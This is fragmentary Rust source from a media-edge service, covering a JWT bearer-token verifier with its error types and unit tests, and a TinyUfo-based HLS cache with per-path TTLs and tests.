datetime.fromisoformat(data["created_at"])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isinstance(data["updated_at"],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data["updated_at"] = datetime.fromisoformat(data["updated_at"])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"""Shared world model for Shadowtag agent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 all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Post new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Vote on existing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Subscribe to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 consensus state and triggers deeper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disagreement is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consensus_threshold: float =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min_votes_for_consensus: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self.consensus_threshold = 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self.min_votes_for_consensus = min_votes_for_consensus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self._findings: dict[str, Finding]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self._subscribers: list[Callable[[str, Finding], None]]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self.total_findings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self.total_votes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self.consensus_reached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self.contests_triggered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post_finding(self, finding: Finding)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"""Post a new finding to the whiteboard."""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self._findings[finding.id] =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self.total_findings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self._notify_subscribers("new_finding", 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vote: Vote,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ConsensusState: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vote to a finding and update consensus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finding_id not in self._findings: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ValueError(f"Finding {finding_id}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 = self._findings[finding_id]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agent already voted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 for i, v in enumerate(finding.votes) if v.agent_id == vote.agent_id),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existing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finding.votes[existing] =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finding.votes.append(vote)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self.total_votes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consensus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old_consensus = finding.consensus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finding.consensus = self._calculate_consensus(finding)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finding.consensus == ConsensusState.AGREED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old_consensus != ConsensusState.AGREED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self.consensus_reached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finding.consensus == ConsensusState.CONTESTED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old_consensus != ConsensusState.CONTESTED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self.contests_triggered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self._notify_subscribers("vote_added", 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finding.consensus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_calculate_consensus(self, finding: Finding) -&gt; ConsensusState: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consensus state based on votes."""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len(finding.votes) &lt; self.min_votes_for_consensus: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ConsensusState.PENDING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finding.agreement_ratio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ratio &gt;= self.consensus_threshold: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ConsensusState.AGREED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ratio &lt;= (1 - self.consensus_threshold):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Strong disagreement - also consensus but negative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ConsensusState.AGREED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Significant disagreement triggers deeper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ConsensusState.CONTESTED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get_finding(self, finding_id: str) -&gt; Finding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finding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self._findings.get(finding_id)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get_all_findings(self)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list(self._findings.values())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get_findings_by_type(self, finding_type: FindingType)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findings filtered by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[f for f in self._findings.values() if f.finding_type == finding_type]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get_findings_by_consensus(self, state: ConsensusState)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findings filtered by consensus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[f for f in self._findings.values() if f.consensus == state]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get_contested_findings(self)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findings that need deeper investigation."""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self.get_findings_by_consensus(ConsensusState.CONTESTED)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get_pending_findings(self)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findings awaiting more votes."""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self.get_findings_by_consensus(ConsensusState.PENDING)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subscribe(self, callback: Callable[[str, Finding], None])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"""Subscribe to whiteboard updates."""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self._subscribers.append(callback)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_notify_subscribers(self, event: str, finding: Finding)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 all subscribers of an update."""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callback in self._subscribers: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asyncio.iscoroutinefunction(callback):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callback(event, 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callback(event, finding)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  # Don't let subscriber errors break the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whiteboard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findings_by_consensus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findings_by_type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self._findings.values():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findings_by_consensus[finding.consensus.value]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findings_by_type[finding.finding_type.value]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"total_findings": self.total_findings,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"total_votes": self.total_votes,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"consensus_reached": self.consensus_reached,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"contests_triggered": self.contests_triggered,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"by_consensus": dict(findings_by_consensus),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"by_type": dict(findings_by_type),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"avg_votes_per_finding":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self.total_votes / self.total_findings if self.total_findings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whiteboard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"consensus_threshold":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"min_votes_for_consensus": self.min_votes_for_consensus,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{fid: f.to_dict() for fid, f in self._findings.items()},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"total_findings": self.total_findings,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"total_votes": self.total_votes,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"consensus_reached": self.consensus_reached,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"contests_triggered": self.contests_triggered,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"""Deserialize whiteboard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wb =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session_id=data["session_id"],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consensus_threshold=data.get("consensus_threshold", 0.70),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min_votes_for_consensus=data.get("min_votes_for_consensus",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fid, fdata in data.get("findings", {}).items():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wb._findings[fid] = Finding.from_dict(fdata)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data.get("metrics",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wb.total_findings = metrics.get("total_findings", len(wb._findings))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wb.total_votes = metrics.get("total_votes",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wb.consensus_reached = metrics.get("consensus_reached",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wb.contests_triggered = metrics.get("contests_triggered",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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/core/whiteboard.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/persistence/__init__.py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"""Persistence backends for Shadowtag whiteboard."""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shadowtag.persistence.firestore_backend import FirestoreBackend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["FirestoreBackend"]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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/persistence/__init__.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/persistence/firestore_backend.py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"""Firestore backend for Shadowtag whiteboard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real-time sync capabilities for the shared whiteboard.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shadowtag.core.whiteboard import Finding,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"""Firestore persistence for Shadowtag whiteboard."""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str = "(default)",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collection: str = "shadowtag_sessions",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 =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self.collection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self._client: firestore.Client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client(self) -&gt; firestore.Client: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initialization of Firestore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self._client = firestore.Client(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project=self.project_id,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database=self.database,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save_whiteboard(self, whiteboard: Whiteboard)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whiteboard state to Firestore."""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doc_ref = self.client.collection(self.collection).document(whiteboard.session_id)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doc_ref.set(whiteboard.to_dict())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load_whiteboard(self, session_id: str) -&gt; Whiteboard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whiteboard state from Firestore."""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doc_ref = self.client.collection(self.collection).document(session_id)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doc_ref.get()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doc.exists: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Whiteboard.from_dict(doc.to_dict())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save_finding(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finding: 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 single finding (for incremental updates)."""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doc_ref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self.client.collection(self.collection)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.collection("findings")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.document(finding.id)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doc_ref.set(finding.to_dict())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delete_session(self, session_id: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session and all its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doc_ref = self.client.collection(self.collection).document(session_id)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subcollection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doc_ref.collection("findings").stream()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finding.reference.delete()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main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doc_ref.delete()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list_sessions(self, limit: int = 100)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recent sessions."""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self.client.collection(self.collection)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.order_by("metrics.total_findings", direction=firestore.Query.DESCENDING)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doc.id,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"total_findings": data.get("metrics", {}).get("total_findings",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"consensus_reached": data.get("metrics", {}).get("consensus_reached",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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/persistence/firestore_backend.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/products/__init__.py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"""Kosmos Dev product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"shadowtag_v2":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"active_development",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"enterprise_saas",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"Enterprise watermark tracking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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/products/__init__.py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"""Kosmos specialized agents for multi-agent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kosmos.agents.data_analysis import DataAnalysisAgent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kosmos.agents.hypothesis import HypothesisAgent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kosmos.agents.literature import LiteratureAgent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kosmos.agents.synthesis import SynthesisAgent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"DataAnalysisAgent",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"HypothesisAgent",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"LiteratureAgent",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"SynthesisAgent",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Agent: Abstract base class for specialized Kosmos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agent specializes in a specific aspect of autonomous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search and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analysis and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Synthesis and report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kosmos.core.orchestrator import ReActOrchestrator, ReActResult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GeminiModel, VertexAIClient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kosmos.core.world_model import KosmosWorldModel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specialized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instruction: str  # System instruction / agent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list[str]  # Tool names this agent can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specialized Kosmos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Has a specific role/instruction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Uses a tailored set of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Operates via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Updates the shared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AgentConfig,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vertex_client: VertexAIClient,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world_model: KosmosWorldModel,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tool_registry: dict[str, Callable],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base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vertex_client: Vertex AI client for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world_model: Shared world model for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tool_registry: Global registry of available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self.vertex_client = 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self.world_model = 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tools for this agent from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{name: tool_registry[name] for name in config.tools if name in tool_registry}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ReAct orchestrator for this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llm_client = vertex_client.get_model(config.model)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self.orchestrator = ReActOrchestrator(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llm_client=llm_client,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world_model=world_model,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max_iterations=config.max_iterations,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temperature=config.temperature,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str, context: dict[str, Any] | None = None)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agent's specialized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context/parameters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execution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_build_goal_with_instruction(self,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goal prompt combining agent instruction with specific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Specific task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goal string for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{self.config.instruction}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 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your tools systematically and reason through each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self.config.name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get_capabilities(self)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agent capabilities (tool names)."""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self.config.tools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f"{self.__class__.__name__}(name={self.config.name},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f"model={self.config.model.value}, tools={self.config.tools})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/data_analysis.py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Analysis Agent: Specializes in data exploration and computational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and explore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analysis code (Python,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 results in scientific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AgentConfig,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kosmos.core.orchestrator import ReActResult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DataAnalysisAgent(BaseAgent):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specialized in data analysis and code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Pro for deep reasoning required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Choosing appropriate statistical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Writing correct analysis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Interpreting complex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DEFAULT_CONFIG = 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name="data_analysis_agent",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model=GeminiModel.PRO,  # Pro model for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instruction="""You are a data analysis specialist with expertise in statistics and computational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Explore datasets to understand structure, distributions,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and apply appropriate statistical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clean, reproducible analysis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Execute analyses and interpret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Create informative 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Validate assumptions and check for statistical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Methods you should consider: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Descriptive statistics (mean, median, variance, correlation)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testing (t-tests, ANOVA, chi-square)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Regression analysis (linear, logistic, non-linear)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Machine learning (classification, clustering, dimensionality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series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Bayesian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data quality and handle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statistical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 effect sizes and confidence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appropriate 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results in clear, scientific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tools=["execute_python", "load_dataset", "plot_generator", "statistical_test"],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temperature=0.5,  # Moderate temperature for creative but accurate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str, context: dict[str, Any] | None = None)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data analysis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"Analyze correlation between variables X and Y in dataset.csv"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"Perform linear regression to predict outcome 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"Create exploratory data visualizations for initial dataset inspection"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Data analysis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with dataset path, parameters,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analysis code, results, and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self._build_goal_with_instruction(task)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context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 += f"\n\nDataset information:\n{context}"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self.orchestrator.execute_cycle(goal)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Post-process: Store analysis results in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self._store_analysis_results(result)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_store_analysis_results(self, result: ReActResult):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analysis results from ReAct execution and store in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ReAct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result.steps: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step.action == "execute_python" and step.observation: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code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self.world_model.add_analysis_result(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code=step.action_input.get("code",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isinstance(step.action_input,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outputs=[step.observation],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success="error" not in step.observation.lower(),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step.action == "plot_generator" and step.observation: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plot reference (observation should contain Cloud Storage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result.steps:  # Get most recent analysis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recent_results = self.world_model.analysis_results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recent_results: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recent_results[-1].plots.append(step.observation)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explore_dataset(self, dataset_path: str)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exploratory data analysis on a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dataset_path: Path to dataset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exploration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 exploratory data analysis on the dataset.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 summary statistics, check for missing values,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visualizations of key variables, and identify potential issues.",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context={"dataset_path": dataset_path},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test_hypothesis(self, hypothesis_id: str, dataset_path: str)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 specific hypothesis using data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hypothesis_id: World model hypothesis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dataset_path: Path to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self.world_model.get_hypothesis(hypothesis_id)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ValueError(f"Hypothesis {hypothesis_id} not found in world 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 the following hypothesis using appropriate statistical methods:\n\n"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f'"{hypothesis.text}"\n\n'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f"Perform the analysis, report test statistics, p-values, effect sizes,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f"and interpret the results in the context of the hypothesis.",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"dataset_path": dataset_path,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run_custom_analysis(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code_hints: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 custom analysis based on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analysis_description: Description of desired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code_hints: Optional code snippets or library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f"Perform the following analysis:\n{analysis_description}"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code_hints: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+= f"\n\nCode hints: {code_hints}"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/data_analysis.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/hypothesis.py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"""Hypothesis Agent: Specializes in generating testable research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hypotheses from data patterns and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hypothesis plausibility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hypotheses by testability and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 hypotheses based on new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AgentConfig,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kosmos.core.orchestrator import ReActResult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specialized in hypothesis generation and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Pro for creative yet rigorous hypothesis formulation.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Synthesizes insights from literature and data to propose testable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DEFAULT_CONFIG = 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name="hypothesis_agent",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model=GeminiModel.PRO,  # Pro model for creative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instruction="""You are a scientific hypothesis generation specialist.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Synthesize insights from literature and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Generate testable, falsifiable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Evaluate hypothesis plausibility and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Prioritize hypotheses by potential impact and feasibility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Refine hypotheses based on feedback and new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quality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**Testable**: Can be empirically validated or falsified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**Specific**: Clearly defined variables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**Grounded**: Based on existing evidence and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**Novel**: Extends beyond obvious or well-established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**Falsifiable**: States conditions that would disprove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**Variables**: Clearly identify independent and dependent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**Relationship**: Specify expected relationship (causal, correlational,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**Mechanism**: Propose underlying mechanism or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**Predictions**: State specific observable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hypothesis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evidence from literature or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Proposed test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confounds or alternative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assessment (0-1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tools=["world_model_query", "literature_query", "analyze_patterns"],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temperature=0.8,  # Higher temperature for creative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str, context: dict[str, Any] | None = None)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hypothesis generation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"Generate hypotheses explaining the observed correlation between X and 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"Propose testable hypotheses based on literature review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"Refine hypothesis H001 based on new experimental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Hypothesis generation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with world model state, constraints,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generated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self._build_goal_with_instruction(task)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world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self.world_model.get_summary()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"\n\nCurrent research state:\n"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f"- Phase: {summary['phase']}\n"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f"- Existing hypotheses: {summary['num_hypotheses']}\n"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f"- Literature refs: {summary['num_literature_refs']}\n"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f"- Analysis results: {summary['num_analysis_results']}\n"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 += f"\n\nAdditional context:\n{context}"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self.orchestrator.execute_cycle(goal)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Post-process: Extract hypotheses and add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self._extract_and_store_hypotheses(result)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_extract_and_store_hypotheses(self, result: ReActResult):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hypotheses from ReAct result and add to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ReAct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hypothesis generation in final answer or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result.final_answer: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hypothesis from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(Simplified - real implementation would parse structured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hypothesis_text = result.final_answer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confidence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0.7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"confidence:" in hypothesis_text.lower():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confidence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self.world_model.add_hypothesis(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text=hypothesis_text,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num_hypotheses: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multiple hypotheses based on current world model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num_hypotheses: Number of hypotheses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focus: Optional focus area (e.g., "causal mechanisms", "correlations")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generated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f"Generate {num_hypotheses} testable hypotheses based on current literature and data."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+= f"\n\nFocus on: {focus}"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+= "\n\nFor each hypothesis, provide:\n"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+= "1. Clear hypothesis statement\n"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+= "2. Supporting evidence\n"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+= "3. Proposed test method\n"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+= "4. Confidence score (0-1)\n"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evaluate_hypothesis(self, hypothesis_id: str)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an existing hypothesis for plausibility and testability.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hypothesis_id: World model hypothesis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self.world_model.get_hypothesis(hypothesis_id)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ValueError(f"Hypothesis {hypothesis_id}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f"Evaluate the following hypothesis:\n\n"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f'"{hypothesis.text}"\n\n'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f"Assess:\n"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f"1. Testability (can it be empirically tested?)\n"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f"2. Specificity (are variables clearly defined?)\n"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f"3. Plausibility (is it consistent with existing evidence?)\n"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f"4. Novelty (does it extend current knowledge?)\n"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f"5. Potential impact (if true, how significant?)\n\n"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f"Provide updated confidence score and recommendations for refinement.",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context={"hypothesis_id": hypothesis_id},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refine_hypothesis(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new_evidence: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a hypothesis based on new evidence.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hypothesis_id: World model hypothesis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new_evidence: Description of new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refined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self.world_model.get_hypothesis(hypothesis_id)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ValueError(f"Hypothesis {hypothesis_id}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f"Refine this hypothesis based on new evidence:\n\n"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f'Original hypothesis: "{hypothesis.text}"\n'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f"Confidence: {hypothesis.confidence}\n\n"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f"New evidence:\n{new_evidence}\n\n"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f"Generate refined hypothesis that incorporates this evidence.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f"Explain how the hypothesis changed and update confidence.",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context={"hypothesis_id": hypothesis_id},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prioritize_hypotheses(self)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"""Prioritize untested hypotheses by feasibility and potential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prioritized hypothesis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untested = self.world_model.get_untested_hypotheses()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untested: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ReActResult(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final_answer="No untested hypotheses in world model.",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total_iterations=0,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termination_reason="no_work",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hypotheses_text =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f"{i + 1}. [{h.id}] {h.text} (confidence: {h.confidence})"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h in enumerate(untested)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f"Prioritize the following untested hypotheses:\n\n"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f"{hypotheses_text}\n\n"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f"Rank by:\n"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f"1. Feasibility (can we test it with available data/methods?)\n"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f"2. Potential impact (how significant if true?)\n"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f"3. Risk/cost of testing\n\n"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f"Return ranked list with justification for each.",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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/hypothesis.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/literature.py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"""Literature Agent: Specializes in academic literature search and citation.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papers via Google Scholar, arXiv, Semantic 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key findings and relevant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citation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literature references in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AgentConfig,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kosmos.core.orchestrator import ReActResult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LiteratureAgent(BaseAgent):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specialized in literature search and knowledge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Flash for fast, cost-effective search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Populates world model with literature references and citation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DEFAULT_CONFIG = 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name="literature_agent",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model=GeminiModel.FLASH,  # Fast model for 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instruction="""You are a literature research specialist.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academic literature using available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Extract key findings, methodologies, and results from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Identify relevant citations and relationships between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Assess relevance of papers to the current research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Maintain citation graph and literature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High-quality peer-reviewed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Recent publications (last 5 years preferred)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Papers with high citation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Methodological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citation information (title, authors, year, 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 (0-1) with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findings summary (2-3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tools=["google_search", "arxiv_search", "semantic_scholar_search"],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temperature=0.3,  # Lower temperature for focused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str, context: dict[str, Any] | None = None)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literature search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"Find papers on reinforcement learning for protein folding"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"Search for recent work on autonomous AI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"Identify seminal papers cited by [paper_id]"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Literature search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with search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discovered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self._build_goal_with_instruction(task)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context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 += f"\n\nAdditional context:\n{context}"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self.orchestrator.execute_cycle(goal)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Post-process: Extract literature refs and add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self._extract_and_store_references(result)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_extract_and_store_references(self, result: ReActResult):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literature references from ReAct result and add to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Parses agent observations for paper metadata and stores in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ReAct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extraction logic - real implementation would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structured output from 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result.steps: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step.action in ["arxiv_search", "semantic_scholar_search", "google_search"]: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step.observation and "title:" in step.observation.lower():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This is a placeholder - actual implementation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parse structured JSON from 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self.world_model.add_literature(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title="Extracted paper title",  # Parse from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authors=["Author1", "Author2"],  # Parse from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abstract="Paper abstract...",  # Parse from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relevance_score=0.8,  # Calculate based on agent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url=None,  # Extract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search_papers(self, query: str, limit: int = 10)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"""Convenience method for paper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papers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f"Search for papers matching: '{query}'. Return top {limit} most relevant papers.",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context={"limit": limit},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find_citations(self, paper_id: str, depth: int = 1)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citations for a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 (DOI, arXiv ID,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depth: Citation depth (1 = direct citations, 2 = second-order,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citation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f"Find all papers that cite '{paper_id}'. Build citation graph to depth {depth}.",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context={"paper_id": paper_id, "depth": depth},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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/literature.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/synthesis.py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"""Synthesis Agent: Specializes in synthesizing findings into structured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Synthesize results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scientific reports with proper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 citations and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publication-ready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AgentConfig,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kosmos.core.orchestrator import ReActResult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SynthesisAgent(BaseAgent):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specialized in synthesis and report writing.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Pro for high-quality scientific writing.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Produces structured reports that synthesize findings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literature, analyses, and hypothesis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DEFAULT_CONFIG = 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name="synthesis_agent",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model=GeminiModel.PRO,  # Pro model for high-quality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instruction="""You are a scientific writing and synthesis specialist.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Synthesize findings from multiple sources (literature, data, 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Write clear, rigorous scientific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Structure content logically with proper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Format citations and references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Create executive summaries for non-technical audiences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**Abstract**: 150-250 word summary of entire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**Introduction**: Background, motivation, research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**Methods**: Data sources, analysis approaches, tools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**Results**: Key findings with supporting evidence (tables, figures)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**Discussion**: Interpretation, implications,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**Conclusions**: Main takeaways and future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**References**: Properly formatted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Writing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**Clarity**: Use clear, precise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**Rigor**: Support claims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**Objectivity**: Present findings honestly, acknowledge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**Conciseness**: Eliminate unnecessary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**Logical flow**: Organize ideas coherently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Citation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APA, IEEE, or Nature format (specify in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all necessary metadata (authors, year, title, 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citation consistency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statistical claims that need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that figures/tables are referenced in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proper attribution of ideas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Flag areas needing more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tools=["report_writer", "citation_formatter", "figure_generator"],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temperature=0.6,  # Moderate temperature for creative but accurate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str, context: dict[str, Any] | None = None)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synthesis/writing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"Write research report synthesizing all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"Create executive summary of hypothesis testing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"Generate discussion section interpreting analysis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Synthesis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with formatting preferences,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generated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self._build_goal_with_instruction(task)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world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self.world_model.get_summary()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"\n\nAvailable content to synthesize:\n"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f"- Research goal: {self.world_model.goal}\n"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f"- Phase: {summary['phase']}\n"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f"- Hypotheses: {summary['num_hypotheses']}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f"({summary['num_tested_hypotheses']} tested)\n"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f"- Analysis results: {summary['num_analysis_results']}\n"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+= f"- Literature references: {summary['num_literature_refs']}\n"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top hypotheses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summary["top_hypotheses"]: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 += "\n\nTop hypotheses:\n"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 in summary["top_hypotheses"]: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goal += f"- {h['text']} (confidence: {h['confidence']:.2f})\n"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 += f"\n\nFormatting preferences:\n{context}"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self.orchestrator.execute_cycle(goal)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write_full_report(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citation_style: str = "APA",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a complete research report synthesizing all findings.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Optional report title (auto-generated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citation_style: Citation format (APA, IEEE, Nature,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full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f"Research Report: {self.world_model.goal}"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f"Write a complete research report with title: '{title}'\n\n"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f"Include all standard sections: Abstract, Introduction, Methods,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f"Results, Discussion, Conclusions, References.\n\n"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f"Synthesize all available findings from hypotheses, analyses, and literature.\n"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f"Use proper scientific writing style and {citation_style} citation format.",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context={"title": title, "citation_style": citation_style},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write_executive_summary(self, max_words: int = 500)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an executive summary for non-technical audiences.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max_words: Maximum word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f"Write an executive summary (max {max_words} words) for a general audience.\n\n"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f"Focus on:\n"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f"1. What question did we investigate?\n"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f"2. What did we find? (key results)\n"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f"3. Why does it matter? (implications)\n\n"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f"Use plain language, avoid jargon, focus on impact.",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context={"max_words": max_words, "audience": "general"},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write_section(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content_focus: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a specific report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section_name: Section to write (e.g., "Methods", "Discussion")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content_focus: Optional focus/emphasis for this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section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f"Write the {section_name} section of a research report."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content_focus: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+= f"\n\nFocus on: {content_focus}"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+= f"\n\nFollow standard scientific writing conventions for {section_name} sections."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format_references(self, citation_style: str = "APA")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properly formatted reference list from world model literature.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citation_style: Citation format (APA, IEEE, Nature,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formatted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lit_refs = self.world_model.literature_refs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lit_refs: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ReActResult(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final_answer="No literature references in world model.",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total_iterations=0,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termination_reason="no_work",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refs_text =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[f"{i + 1}. {ref.title} - {', '.join(ref.authors)}" for i, ref in enumerate(lit_refs)],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f"Format the following references in {citation_style} style:\n\n"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f"{refs_text}\n\n"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f"Produce a properly formatted reference list, sorted alphabetically by author.",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context={"citation_style": citation_style},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create_figures_and_tables(self)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publication-ready figures and tables from analysis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figure/table descriptions and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 all analysis results and create:\n"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"1. List of publication-ready figures (with captions)\n"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"2. List of tables summarizing key results\n"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"3. Recommendations for figure/table placement in report\n\n"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 each figure/table, provide:\n"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Descriptive caption\n"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Data source\n"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Key takeaway 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apps/aiyou_stack/aiyou-fastapi-services/kosmos/agents/synthesis.py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.kosmos_instance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create_kosmos,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create_kosmos_pool,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["KosmosInstance", "KosmosPool", "KosmosType", "create_kosmos", "create_kosmos_pool"]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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/kosmos_instance.py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"""Kosmos Instance - Autonomous AI Scientist per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Wraps an LLM + RSTA Squadron (380 agents) into a single Kosmos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Kosmos operates autonomously with its own agents using ONLY its own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on: https://arxiv.org/pdf/2511.02824 (Kosmos AI Scientist)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Combined with: FM 3-21.31 RSTA Squadron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Self-verification via RSTA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logic bleed between LLM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security (replaces static allow/deny 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agents.rsta_squadron import Agent, create_rsta_squadron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Kosmos instances in the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GEMINI_INTAKE = "gemini_intake"  # Stage 1: Gemini 2M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PERPLEXITY = "perplexity"  # Stage 2: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SUPERGROK = "supergrok"  # Stage 3: X/Grokipedia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GEMINI_CODE_ASSIST = "gemini_code"  # Stage 4: 10×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Kosmos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kosmos_type: KosmosType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api_key_env: str  # Environment variable name for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agents_per_instance: int = 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consensus_threshold: float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configurations for each Kosmos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KosmosType.GEMINI_INTAKE: KosmosConfig(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kosmos_type=KosmosType.GEMINI_INTAKE,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api_url="https://generativelanguage.googleapis.com/v1beta/models",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api_key_env="GEMINI_API_KEY",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KosmosType.PERPLEXITY: KosmosConfig(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kosmos_type=KosmosType.PERPLEXITY,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model_name="llama-3.1-sonar-large-128k-online",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api_url="https://api.perplexity.ai/chat/completions",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api_key_env="PERPLEXITY_API_KEY",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KosmosType.SUPERGROK: KosmosConfig(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kosmos_type=KosmosType.SUPERGROK,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model_name="grok-2-latest",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api_url="https://api.x.ai/v1/chat/completions",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api_key_env="GROK_API_KEY",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KosmosType.GEMINI_CODE_ASSIST: KosmosConfig(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kosmos_type=KosmosType.GEMINI_CODE_ASSIST,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api_url="https://generativelanguage.googleapis.com/v1beta/models",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api_key_env="GEMINI_API_KEY",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"""Autonomous AI Scientist instance with embedded RSTA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Has 380 agents (RSTA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Uses ONLY its own LLM model (no cross-contamination)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Reaches consensus BEFORE passing to next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Replaces static allow/deny lists with dynamic security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kosmos_type: KosmosType,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KosmosConfig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instance_id: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Kosmos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kosmos_type: Type of Kosmos (GEMINI_INTAKE, PERPLEXITY,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Optional custom config, defaults to KOSMOS_CONFIGS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instance_id: Instance ID (1-10 for parallel Code Assist)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self.kosmos_type = kosmos_type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KOSMOS_CONFIGS[kosmos_type]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self.instance_id = instance_id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RSTA Squadron with this LLM's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self.squadron = create_rsta_squadron(model=self.config.model_name)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API key (support multi-account for Code Assist)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kosmos_type == KosmosType.GEMINI_CODE_ASSIST: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GEMINI_KEY_1, GEMINI_KEY_2, etc. for multi-account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self.api_key = os.getenv(f"GEMINI_KEY_{instance_id}") or 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self.config.api_key_env,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self.api_key = os.getenv(self.config.api_key_env)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f"Initialized Kosmos-{kosmos_type.value}#{instance_id}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f"with {self.squadron.get_status()['total_agents']}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str =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task through this Kosmos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RECON: Explore solution options (180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SURV: Monitor for errors (60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S-2 INTEL: Gather intelligence (20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MFRC: Security validation via consensus (60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COMMAND: Final decision (10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from prior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LOW/MEDIUM/HIGH/EXTREME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with consensus outcome and generated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RSTA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consensus_result = await self.squadron.execute_with_consensus(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execute_fn=self._execute_single_agent,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threshold=self.config.consensus_threshold,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consensus reached, generate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consensus_result["consensus_reached"]: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self._generate_output(task,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f"Consensus not reached ({consensus_result['consensus_percent']:.0%} &lt; {consensus_result['threshold']:.0%})",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"kosmos_type": self.kosmos_type.value,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"instance_id": self.instance_id,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consensus_result,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self.config.model_name,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"agents_used": consensus_result["recon_count"]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consensus_result["surv_count"]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consensus_result["intel_count"],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"duration_ms": (datetime.utcnow() - start_time).total_seconds()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_execute_single_agent(self, agent: Agent,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with a single agent (LLM call)"""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makes the actual LLM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simulated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agent.role,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f"Agent {agent.agent_id} processed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final output after consensus reached"""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f"No API key for {self.config.api_key_env}", "fallback":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self._build_prompt(task,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self.kosmos_type in [KosmosType.GEMINI_INTAKE, KosmosType.GEMINI_CODE_ASSIST]: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self._call_gemini(prompt)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self.kosmos_type == KosmosType.PERPLEXITY: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self._call_perplexity(prompt)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self.kosmos_type == KosmosType.SUPERGROK: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self._call_grok(prompt)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logger.error(f"Kosmos {self.kosmos_type.value}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"fallback":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_build_prompt(self, task: str, context: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with context from prior stages"""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[f"Task: {task}"]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"reasoning_chain"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prompt_parts.append("\n## Prior Reasoning Chain:")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reasoning in context["reasoning_chain"]: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prompt_parts.append(f"- {reasoning}")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"evidence"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prompt_parts.append("\n## Evidence Found:")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evidence in context["evidence"]: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prompt_parts.append(f"- {evidence}")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_call_gemini(self,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Gemini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f"{self.config.api_url}/{self.config.model_name}:generateContent?key={self.api_key}"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httpx.AsyncClient(timeout=120.0)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"contents": [{"parts": [{"text": prompt}]}],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"generationConfig":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"temperature":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"maxOutputTokens":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data.get("candidates", [{}])[0]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.get("content",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.get("parts", [{}])[0]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{"text": text, "model": self.config.model_name}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f"API error: {response.status_code}", "body": response.text}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_call_perplexity(self,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Perplexity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httpx.AsyncClient(timeout=120.0)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self.config.api_url,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self.config.model_name,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data.get("choices", [{}])[0].get("message", {}).get("content",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{"text": text, "model": self.config.model_name}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f"API error: {response.status_code}"}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_call_grok(self,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Grok/X.AI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httpx.AsyncClient(timeout=120.0)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self.config.api_url,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"Authorization": f"Bearer {self.api_key}",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self.config.model_name,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data.get("choices", [{}])[0].get("message", {}).get("content",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{"text": text, "model": self.config.model_name}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f"API error: {response.status_code}"}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Kosmos instance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squadron_status = self.squadron.get_status()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"kosmos_type": self.kosmos_type.value,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"instance_id": self.instance_id,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self.config.model_name,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squadron_status["total_agents"],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"ready_agents": squadron_status["ready_agents"],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"readiness_percent": squadron_status["readiness_percent"],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"uptime_seconds": (datetime.utcnow() - self.created_at).total_seconds(),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"has_api_key": bool(self.api_key),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"""Pool of Kosmos instances for parallel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10× Gemini Code Assist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kosmos_type: KosmosType, pool_size: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self.kosmos_type = kosmos_type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self.pool_size = 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self.instances: list[KosmosInstance]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self.semaphore = asyncio.Semaphore(pool_size)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pool of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pool_size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 = KosmosInstance(kosmos_type, instance_id=i)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self.instances.append(instance)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KosmosPool with {pool_size} instances ({kosmos_type.value})")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str =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multiple tasks in parallel across pool"""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process_with_instance(task: str, instance: KosmosInstance):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self.semaphore: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instance.process(task, context, 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Distribute tasks across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coroutines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task in enumerate(tasks):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 = self.instances[i % len(self.instances)]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coroutines.append(process_with_instance(task, instance))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asyncio.gather(*coroutines,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pool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= sum(inst.squadron.get_status()["total_agents"] for inst in self.instances)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"kosmos_type": self.kosmos_type.value,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"pool_size": self.pool_size,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"instances": [inst.get_status() for inst in self.instances],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create_kosmos(kosmos_type: KosmosType, instance_id: int = 1) -&gt; KosmosInstance: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single Kosmos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KosmosInstance(kosmos_type, instance_id=instance_id)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create_kosmos_pool(kosmos_type: KosmosType, pool_size: int = 10) -&gt; KosmosPool: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pool of Kosmos instances"""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KosmosPool(kosmos_type, pool_size)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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/kosmos_instance.py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"""ReAct Orchestrator: Implements the Reason → Act → Observe → Reason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ReAct framework (arxiv 2210.03629), this orchestrator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interpretable, grounded agent behavior through explicit reasoning traces,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actions, and observation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kosmos.core.world_model import KosmosWorldModel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step in the ReAct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thought: str  # LLM's reasoning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| None  # Tool name to invoke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action_input: dict[str, Any] | None  # Tool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observation: str | None  # Tool result /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"iteration": self.iteration,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"thought": self.thought,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self.action,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"action_input": self.action_input,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"observation": self.observation,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complete ReAct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list[ReActStep]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total_iterations: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termination_reason: str  # "goal_achieved", "max_iterations",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"final_answer": self.final_answer,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"steps": [step.to_dict() for step in self.steps],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"total_iterations": self.total_iterations,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"termination_reason": self.termination_reason,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self.error,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ReAct loop orchestrator for Kosmos-pattern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REASON: LLM generates thought + selects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ACT: Execute tool/function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OBSERVE: Capture result and append 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Repeat until goal achieved or max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orchestrator coordinates with the world model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long-horizon state across multiple ReAct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ReAct prompt template following arxiv 2210.03629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REACT_PROMPT_TEMPLATE = """You are a research agent working towards the following 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{goal}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access to the following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{tool_descriptions}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following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Thought: [Your reasoning about what to do next]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Action: [Tool name to use, or "Final Answer" if goal is achieved]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Input: [JSON object with tool parameters, or final answer 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each action, you will receive an observation. Then continue with another Thought/Action/Observation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have completed the goal,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Action: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Input: [Your final answer/result]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world model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{world_model_summary}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Previous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{previous_steps}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Thought:"""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llm_client: Any,  # Vertex AI GenerativeModel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dict[str, Callable],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world_model: KosmosWorldModel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ReAct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llm_client: Vertex AI GenerativeModel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 Dictionary of tool_name -&gt; callable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world_model: Optional KosmosWorldModel for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Maximum ReAct loop iterations (safety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LLM temperature for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self.llm_client = llm_client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self.world_model = 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self.max_iterations = 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self.temperature =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execute_cycle(self, goal: str, context: list[ReActStep] | None = None) -&gt; ReActResult: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complete ReAct cycle until goal is achieved or max iterations.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goal: Task description / research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previous ReAct steps to continue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ReActResult with execution trace and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context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 = len(steps)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iteration &lt; self.max_iterations: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Build prompt with 